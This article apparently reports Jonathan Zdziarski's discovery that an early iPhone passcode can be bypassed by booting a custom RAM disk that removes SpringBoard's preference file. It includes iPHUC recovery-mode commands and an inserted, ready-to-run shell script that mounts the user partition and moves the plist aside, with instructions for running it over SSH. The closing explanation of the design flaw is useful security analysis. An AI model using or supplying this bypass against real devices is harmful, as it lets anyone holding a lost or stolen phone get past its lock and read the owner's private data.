So you've set a passcode for your iPhone, and you're feeling smug and secure. You can leave the device unattended on your desk, or worse, have it stolen or lost without fear of prying eyes accessing your private data -- right?
As discovered by Jonathan Zdziarski, who has established himself as something of an iPhone forensics expert, the iPhone's passcode mechanism should leave you feeling neither smug nor secure, and represents little more than a mild deterrent for would-be viewers of your private data.
Zdziarski has outlined a three-step process for cracking the iPhone's passcode, as follows:
- Prepare a custom iPhone RAM disk. There are numerous how-tos out there on how to do this. Your custom RAM disk will need to mount /dev/rdisk0s2 (say, at /mnt) and simply delete the file /mnt/mobile/Library/Preferences/com.apple.springboard.plist. This is the config file that tells SpringBoard "passcode: on".
- Use the iPhone Utility Client (iPHUC) to place the device into recovery mode and then boot the RAM disk using something like:

  ```
  (iPHUC Recovery) #: filecopytophone Bypass_Passcode.bin
  filecopytophone: 0
  (iPHUC Recovery) #: cmd setenv\ boot-args\ rd=md0\ -x\ -s\ pmd0=0x9340000.0xA00000
  (iPHUC Recovery) #: cmd saveenv
  (iPHUC Recovery) #: cmd bootx
  ```

- After your custom RAM disk blows away the SpringBoard config, reboot the phone and the passcode will be circumvented, because SpringBoard's default is "no passcode".
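The following script is an added example of what the RAM disk's payload for step 1 can look like; it is not Zdziarski's own script and not taken from the original post. It follows the post's procedure (mount the partition, get rid of the SpringBoard plist) but moves the file aside instead of deleting it, so the original setting can be put back afterwards and nothing is lost for a later forensic look. Everything beyond the post's own details is an assumption: that the RAM disk provides sh, mount, umount and mv, that a plain `mount /dev/rdisk0s2 /mnt` works without extra options, the `RAMDISK_APPLY` switch, and the function names.

```shell
#!/bin/sh
# Added example, not from the original post. Payload for the custom RAM disk:
# mount the partition holding the user's preferences and move SpringBoard's
# preference file aside so SpringBoard falls back to its "no passcode" default.
# Assumptions (not stated in the post): sh, mount, umount and mv exist on the
# RAM disk; /dev/rdisk0s2 mounts with a bare "mount"; RAMDISK_APPLY is our own
# switch so that sourcing the file only defines the functions.

# Path of the plist relative to the mount point, as given in the post.
PLIST_REL="mobile/Library/Preferences/com.apple.springboard.plist"

# Move the plist aside on the partition mounted at $1.
# Returns 0 if the file was moved, 2 if it was already absent (SpringBoard
# then already defaults to "no passcode"), 1 if $1 is not a mounted user
# partition or the move failed.
disable_passcode_flag() {
    mnt="$1"
    plist="$mnt/$PLIST_REL"
    if [ ! -d "$mnt/mobile" ]; then
        echo "disable_passcode_flag: $mnt does not look like the mounted user partition" >&2
        return 1
    fi
    if [ ! -f "$plist" ]; then
        echo "disable_passcode_flag: $PLIST_REL not present under $mnt, nothing to do" >&2
        return 2
    fi
    mv "$plist" "$plist.bak" || return 1
    echo "moved $plist -> $plist.bak"
    return 0
}

# Put the saved plist back so the passcode is enforced again on the next boot.
# Returns 0 on success, 2 if there is no saved copy, 1 if the move failed.
restore_passcode_flag() {
    mnt="$1"
    plist="$mnt/$PLIST_REL"
    if [ ! -f "$plist.bak" ]; then
        echo "restore_passcode_flag: no saved copy under $mnt" >&2
        return 2
    fi
    mv "$plist.bak" "$plist" || return 1
    echo "restored $plist"
    return 0
}

# Real run from the RAM disk:   RAMDISK_APPLY=1 sh bypass.sh
# Undo from the RAM disk:       RAMDISK_APPLY=1 RAMDISK_RESTORE=1 sh bypass.sh
if [ "${RAMDISK_APPLY:-0}" = 1 ]; then
    mkdir -p /mnt
    mount /dev/rdisk0s2 /mnt || exit 1      # device and mount point as in the post
    if [ "${RAMDISK_RESTORE:-0}" = 1 ]; then
        restore_passcode_flag /mnt
    else
        disable_passcode_flag /mnt
    fi
    rc=$?
    umount /mnt
    exit $rc
fi
```

The same two functions reproduce the hand test Zdziarski describes on a phone you can already reach over SSH: there the user partition is mounted at /private/var, so `disable_passcode_flag /private/var` followed by a reboot does what deleting the file by hand does, and `restore_passcode_flag /private/var` undoes it (the /private/var mapping is an assumption about the running system, not something the post states).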
As the steps show, the process takes some care and familiarity with iPhone hacking tools, but anyone with physical access to the phone can finish it in minutes. The weak point is structural: the passcode is enforced only by SpringBoard, which decides whether to ask for one by reading an on/off flag from a property list on the phone's own storage, and recovery mode lets whoever holds the device boot a RAM disk that can edit that storage. The passcode itself, stored in the keychain, is never consulted along the way.
"What a shame, that Apple went to the trouble of storing the passcode in the keychain, and yet the switch to turn it on and off is sitting in a little property list. You can test this on your own iPhone without all the trouble by simply ssh'ing into it and deleting this file by hand, then reboot."